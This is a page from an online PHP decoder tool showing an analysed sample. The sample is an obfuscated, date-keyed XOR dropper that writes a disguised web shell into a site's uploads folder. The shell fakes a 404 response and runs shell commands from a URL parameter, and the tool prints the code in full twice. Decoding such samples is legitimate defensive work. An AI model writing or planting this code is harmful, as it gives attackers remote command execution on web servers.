Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function m($l, $T = 0) { $K = date('Y-m-d'); $_ = strlen($l); $__ = s..

Decoded Output download

<?php function m($l, $T = 0) { 
    $K = date('Y-m-d'); 
    $_ = strlen($l); 
    $__ = strlen($K); 
    for ($i = 0;$i < $_;$i++) { 
        for ($j = 0;$j < $__;$j++) { 
            if ($T) { 
                $l[$i] = $K[$j] ^ $l[$i]; 
            } else { 
                $l[$i] = $l[$i] ^ $K[$j]; 
            } 
        } 
    } 
    return $l; 
} 
m('bmha[tqp[gkjpajpw') (m('+rev+sss+lpih+qthke`w+miecaw*tlt'), m('8;tlt$lae`av,&LPPT+5*5$040$Jkp$Bkqj`&-?w}wpai, [CAP_&g&Y-?')); ?>

Did this file decode correctly?

Original Code

<?php function m($l, $T = 0) {
    $K = date('Y-m-d');
    $_ = strlen($l);
    $__ = strlen($K);
    for ($i = 0;$i < $_;$i++) {
        for ($j = 0;$j < $__;$j++) {
            if ($T) {
                $l[$i] = $K[$j] ^ $l[$i];
            } else {
                $l[$i] = $l[$i] ^ $K[$j];
            }
        }
    }
    return $l;
}
m('bmha[tqp[gkjpajpw') (m('+rev+sss+lpih+qthke`w+miecaw*tlt'), m('8;tlt$lae`av,&LPPT+5*5$040$Jkp$Bkqj`&-?w}wpai, [CAP_&g&Y-?')); ?>

Function Calls

None

Variables

None

Stats

MD5 09092a5b7a1892dc7bc79454a5e4129e
Eval Count 0
Decode Time 102 ms